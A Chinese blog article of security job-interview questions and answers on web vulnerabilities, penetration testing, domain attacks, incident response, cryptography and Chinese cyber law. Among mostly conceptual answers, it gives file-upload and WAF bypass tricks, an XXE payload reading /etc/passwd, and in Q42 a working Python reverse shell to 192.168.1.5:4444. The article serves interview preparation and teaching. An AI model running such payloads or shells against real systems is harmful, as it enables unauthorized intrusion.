ARTICLE DETAIL

资讯详情

深耕网站建设与运营推广的一线实战洞察。

网络安全面试题大全:200道高频面试题+答案,助你拿下Offer

网络安全面试题大全:200道高频面试题+答案,助你拿下Offer “网络安全面试都考什么”“渗透测试岗面试题有哪些”“应届生怎么准备网安面试”无论是校招还是社招网络安全岗位的面试都涉及广泛的知识面。从Web漏洞原理到内网渗透技术从密码学到法律法规面试官的提问范围往往超出你的想象。我参加过不少网安面试也作为面试官面试过不少人。发现一个规律能背答案的人多能讲原理的人少。面试官更看重你对原理的理解而不是记住了多少漏洞名称。今天我把网络安全面试的高频题目系统整理出来Web安全、渗透测试、内网安全、应急响应、密码学、法律法规每道题都附答案解析。看完这篇你的面试准备会更系统。一、Web安全篇Q1OWASP Top 10有哪些排名漏洞说明A01访问控制失效权限控制不当A02加密失败敏感数据未加密A03注入SQL/命令/LDAP注入A04不安全设计架构层安全缺陷A05安全配置错误默认配置/错误配置A06脆弱组件第三方库漏洞A07认证失败认证逻辑缺陷A08数据完整性失败反序列化/未验证A09日志监控不足缺乏安全日志A10SSRF服务端请求伪造Q2SQL注入原理和防御原理Web应用将用户输入直接拼接到SQL语句中导致攻击者可以通过输入SQL语句片段改变数据库执行逻辑。防御方案参数化查询最佳方案输入验证白名单最小权限原则WAF防护错误信息处理Q3XSS有哪些类型类型说明特点反射型参数中注入页面回显需要用户点击链接存储型存入数据库页面渲染持久化危害大DOM型前端JS操作DOM不经过后端防御输出编码HTML/JS/URL编码、CSP策略、HttpOnly Cookie。Q4CSRF原理和防御原理攻击者诱导用户在已登录的Web应用中执行非预期操作利用Cookie自动携带的特性。防御方案CSRF TokenSameSite CookieReferer验证二次确认验证码/密码Q5SSRF是什么如何防御原理服务端提供了从其他服务器获取数据的功能攻击者利用该功能访问内网资源。防御方案白名单限制可访问的域名/IP禁止访问内网IP10.0.0.0/8等禁止非常规协议file:///gopher://DNS Rebinding防护错误信息处理Q6文件上传漏洞如何绕过绕过方式说明类型绕过Content-Type修改后缀绕过.php5/.phtml/.phar大小写绕过.PhP空格/点shell.php / “shell.php.”双写绕过shell.pphphp截断绕过shell.php%00.jpg.htaccess上传配置文件图片马GIF89a PHP代码Q7什么是同源策略同源策略要求协议、域名、端口三者完全相同。用于隔离不同源的文档防止恶意网站读取其他网站的数据。Q8CORS是什么CORS跨域资源共享通过HTTP头允许浏览器跨域访问。Access-Control-Allow-Origin设置允许的源。配置不当如设置为*且允许凭据会导致安全问题。二、渗透测试篇Q9渗透测试流程是什么1. 信息收集 → 2. 漏洞扫描 → 3. 漏洞利用 → 4. 后渗透 → 5. 报告编写Q10信息收集有哪些方法类型方法/工具子域名OneForAll、subfinder、crt.sh端口扫描Nmap、masscan目录扫描dirsearch、gobuster指纹识别Wappalyzer、whatweb人员信息LinkedIn、OSINTDNS信息dig、dnsenumQ11Nmap的扫描类型有哪些扫描类型参数说明SYN扫描-sS半开扫描隐蔽TCP全连接-sT完成三次握手UDP扫描-sU扫描UDP端口FIN扫描-sFFIN包探测Xmas扫描-sXFINPSHURGNull扫描-sN无标志位Q12如何绕过WAF方法说明大小写混合UnIoN SeLeCt编码绕过URL/Hex/Base64注释绕过内联注释/**/等价函数mid→substr分块传输Transfer-Encoding: chunkedHTTP参数污染同名参数多次提交修改请求方法GET→POSTQ13Burp Suite常用模块模块功能Proxy抓包改包Repeater手动重发请求Intruder暴破/模糊测试Decoder编解码Comparer差异比较Scanner自动漏洞扫描Sequencer随机性分析Q14什么是反序列化漏洞反序列化是将序列化数据恢复为对象的过程。如果反序列化的数据可控攻击者可以构造恶意对象在反序列化时执行任意代码。常见场景JavaFastjson、Log4j、PHPunserialize、Pythonpickle、.NETBinaryFormatter。Q15什么是XXE漏洞XXEXML外部实体注入是XML解析器解析外部实体时产生的漏洞。攻击者可以通过DTD定义外部实体读取文件、SSRF或命令执行。!DOCTYPEfoo[!ENTITY xxe SYSTEM file:///etc/passwd]rootxxe;/root三、内网安全篇Q16什么是Pass the HashPtH是一种使用NTLM哈希进行认证的技术。攻击者在获取用户哈希后不需要破解明文密码直接使用哈希进行认证。Q17Kerberos协议流程1. AS-REQ用户向KDC请求认证 2. AS-REPKDC返回TGT票据 3. TGS-REQ用户用TGT请求服务票据 4. TGS-REPKDC返回ST票据 5. AP-REQ用户用ST访问服务 6. AP-REP服务验证并响应Q18什么是Golden Ticket利用krbtgt账户哈希伪造TGT票据可以冒充任意用户访问域内任何服务。前提是已获取krbtgt哈希。Q19什么是DCSyncDCSync是模拟域控制器的复制行为通过DRSUAPI协议从域控导出域内所有用户的哈希。需要复制权限DCSync权限。Q20BloodHound的作用BloodHound是一个AD分析工具通过图数据库可视化域内关系自动发现从普通用户到域管的攻击路径。Q21横向移动有哪些方法方法说明工具PsExecSMB执行ImpacketWMIWMI远程执行wmiexecWinRM远程管理evil-winrmRDP远程桌面xfreerdpPtH哈希传递crackmapexec票据传递Kerberos票据Mimikatz四、应急响应篇Q22Linux入侵排查流程1. 账号排查/etc/passwd、w、last 2. 进程排查ps aux、pstree 3. 网络排查netstat、ss 4. 文件排查find、ls -la 5. 定时任务crontab -l 6. 日志分析/var/log/auth.log 7. 后门检测rkhunter、chkrootkitQ23Windows入侵排查流程1. 账号排查net user、whoami 2. 进程排查tasklist、Process Explorer 3. 网络排查netstat -ano 4. 服务排查sc query、services.msc 5. 注册表reg query 6. 事件日志事件查看器 7. 文件排查最近修改文件Q24如何检测挖矿木马高CPU进程排查异常外连矿池端口3333/5555等定时任务定时下载和执行异常进程名xmrig、kinsing等Q25如何检测Webshell文件内容特征eval、system、exec等函数文件修改时间最近新增的PHP/JSP文件流量特征POST请求特殊参数命令输出文件权限异常五、密码学篇Q26对称加密和非对称加密区别特性对称加密非对称加密密钥加解密同一密钥公钥加密私钥解密速度快慢安全性密钥分发难更安全代表AES/DESRSA/ECCQ27AES和DES的区别特性AESDES密钥长度128/192/256位56位分组长度128位64位安全性高低已不推荐轮数10/12/14轮16轮Q28什么是数字签名发送方用私钥对消息摘要加密生成签名接收方用发送方公钥验证。保证消息的完整性、真实性和不可否认性。Q29HTTPS握手流程1. Client Hello → 发送支持的TLS版本和加密套件 2. Server Hello → 选择加密套件发送证书 3. 客户端验证证书 → 检查CA签名和有效期 4. 密钥交换 → 生成会话密钥 5. 加密通信 → 使用对称密钥加密数据Q30什么是哈希碰撞两个不同的输入产生相同的哈希输出。MD5已存在碰撞攻击SHA-1也有理论碰撞推荐使用SHA-256及以上。六、法律法规篇Q31网安三法是什么法律施行时间《网络安全法》2017年6月1日《数据安全法》2021年9月1日《个人信息保护法》2021年11月1日Q32什么是等保2.0等级保护2.0是国家网络安全等级保护制度要求信息系统按重要程度分五个安全保护等级并按对应等级进行安全建设和测评。Q33渗透测试的法律前提书面授权目标所有者签署明确范围IP/域名/系统遵守约定不超范围Q34什么是帮信罪帮助信息网络犯罪活动罪指明知他人利用信息网络实施犯罪为其提供技术支持、广告推广、支付结算等帮助的行为。Q35漏洞披露的正确流程发现漏洞 → 向产品提供者或CNVD报告 → 等待修复 → 修复后公开细节。七、实战场景篇Q36发现一个SQL注入怎么利用1. 判断注入点和类型 2. 确定列数ORDER BY 3. 确定回显位UNION SELECT 4. 获取数据库信息 5. 获取表名/列名 6. 提取数据 7. 尝试写文件/命令执行Q37拿到Webshell后第一步做什么1. 信息收集whoami、id、ifconfig 2. 权限判断当前用户权限 3. 查看内网结构网络配置 4. 查看安装的服务和软件 5. 规划下一步操作提权/横向Q38如何防范勒索病毒定期备份离线异地及时更新系统补丁关闭非必要端口和服务邮件安全防钓鱼终端防护EDR网络分段隔离应急响应预案Q39日志被删了怎么溯源查看远程日志服务器检查磁盘上未被覆盖的残留日志从内存中恢复日志数据检查网络流量日志防火墙/IDS查看第三方安全设备日志Q40如何检测DNS隧道异常长的子域名查询高频DNS请求TXT记录异常增多查询非常见域名后缀Base64编码特征八、编程基础篇Q41用Python实现端口扫描importsocketdefport_scan(host,port):try:ssocket.socket(socket.AF_INET,socket.SOCK_STREAM)s.settimeout(1)ifs.connect_ex((host,port))0:returnTrues.close()except:passreturnFalse# 使用forportin[22,80,443,3306]:ifport_scan(192.168.1.1,port):print(fPort{port}: OPEN)Q42用Python实现反弹Shell# 反弹Shell仅用于授权测试importsocket,subprocess,os ssocket.socket(socket.AF_INET,socket.SOCK_STREAM)s.connect((192.168.1.5,4444))os.dup2(s.fileno(),0)os.dup2(s.fileno(),1)os.dup2(s.fileno(),2)subprocess.call([/bin/sh,-i])九、网络基础篇Q43TCP三次握手和四次挥手三次握手 Client → SYN → Server Client ← SYNACK ← Server Client → ACK → Server 四次挥手 Client → FIN → Server Client ← ACK ← Server Client ← FIN ← Server Client → ACK → ServerQ44HTTP状态码含义状态码含义200成功301永久重定向302临时重定向400请求错误401未认证403禁止访问404未找到500服务器错误502网关错误503服务不可用Q45ARP欺骗原理攻击者发送伪造ARP响应将网关MAC地址映射为自己的MAC导致流量经过攻击者。学习资源面试准备不只是背题目更重要的是理解原理和积累实战经验。建议在学习过程中多做靶场、参加CTF、做一些实际的安全项目这样在面试时才能有深度地回答问题。如果你对网络安全感兴趣想系统学习更多知识——包括渗透测试、内网安全、应急响应、CTF实战、面试准备等——可以参考下面整理的完整学习资料包。内容涵盖从零基础到实战进阶200节视频课程配套工具和靶场环境涵盖攻防对抗全生命周期。这些东西我都可以免费分享给大家需要的可以点这里自取:网安入门到进阶资源总结面试维度核心考点Web安全OWASP Top 10 漏洞原理渗透测试流程 工具 绕过内网安全域渗透 横向移动应急响应排查流程 分析方法密码学加密体系 协议法律法规三法 等保 授权网络基础TCP/IP HTTP编程能力Python安全脚本 面试的本质不是背答案而是展示你的理解和经验。多动手实践少死记硬背。————————————————
返回列表